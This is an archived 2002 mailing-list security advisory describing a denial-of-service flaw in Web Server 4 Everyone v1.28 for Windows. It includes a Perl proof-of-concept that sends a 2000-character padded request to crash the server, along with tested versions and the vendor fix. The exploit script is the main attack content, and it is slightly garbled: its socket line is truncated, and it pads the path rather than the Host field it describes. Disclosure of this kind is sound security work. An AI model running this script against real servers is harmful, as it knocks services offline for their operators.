lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
From: ts at (Tamer Sahin)
Subject: [SecurityOffice] Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability

Hash: MD5

- --[ Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability ]--

- --[ Type

Denial of Service

- --[ Release Date

October 23, 2002

- --[ Product / Vendor

Web Server 4 Everyone is an Internet and Intranet server that supports HTTP Services.
Web Server 4 Everyone is available for Microsoft Windows operating systems.

- --[ Summary

The problem is Web Server 4 Everyone v1.28 with bounds checking, when you request 2000
characters "web4all.exe"  just shuts down. This vulnerability also affects Web Server 4
Everyone versions prior to v1.28 for Microsoft Windows 2000.

When the attacker send a request in size of 2000 characters in "Host:" field that contains
all "", the server  crashes. In case you send a request that size without adding
the "Host:" there is no effect on running program. The Web server must be restarted to
regain normal functionality.

- --[ Exploit

An exploit for this vulnerability exists and is available below.

=============== SNIP ===============

#!/usr/bin/perl -w

use IO::Socket;

$host = $ARGV[0];
$port = $ARGV[1];
$evil = "A" x 2000;

print "Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability by SecurityOffice\n";
print "Usage: $0 host port\n";
print "Connecting...\n";
$socket = IO::Socket::INET->
            || die "Connection failed.\n";

print "Attacking...\n";
print $socket "GET /$evil HTTP/1.1\n Host:\n\n";

print "\nConnection closed. Finished.\n\n";

=============== SNIP ===============

- --[ Tested

Windows 2000 Sp3 / Web Server 4 Everyone v1.28
Windows 98 SE / Web Server 4 Everyone v1.28

- --[ Vulnerable

Web Server 4 Everyone v1.28

- --[ Vendor Status

This vulnerability fixed Web Server 4 Everyone v1.32

- --[ Disclaimer is not responsible for the misuse or illegal use of
any of the information and/or the software listed on this security advisory.

- --[ Author

Tamer Sahin

All our advisories can be viewed at

Please send suggestions, updates, and comments to

(c) 2002 SecurityOffice

This Security Advisory may be reproduced and distributed, provided that this Security
Advisory is not modified in any way and is attributed to SecurityOffice and provided
that such reproduction and distribution is performed for non-commercial purposes.

Tamer Sahin

Version: 2.6


Powered by blists - more mailing lists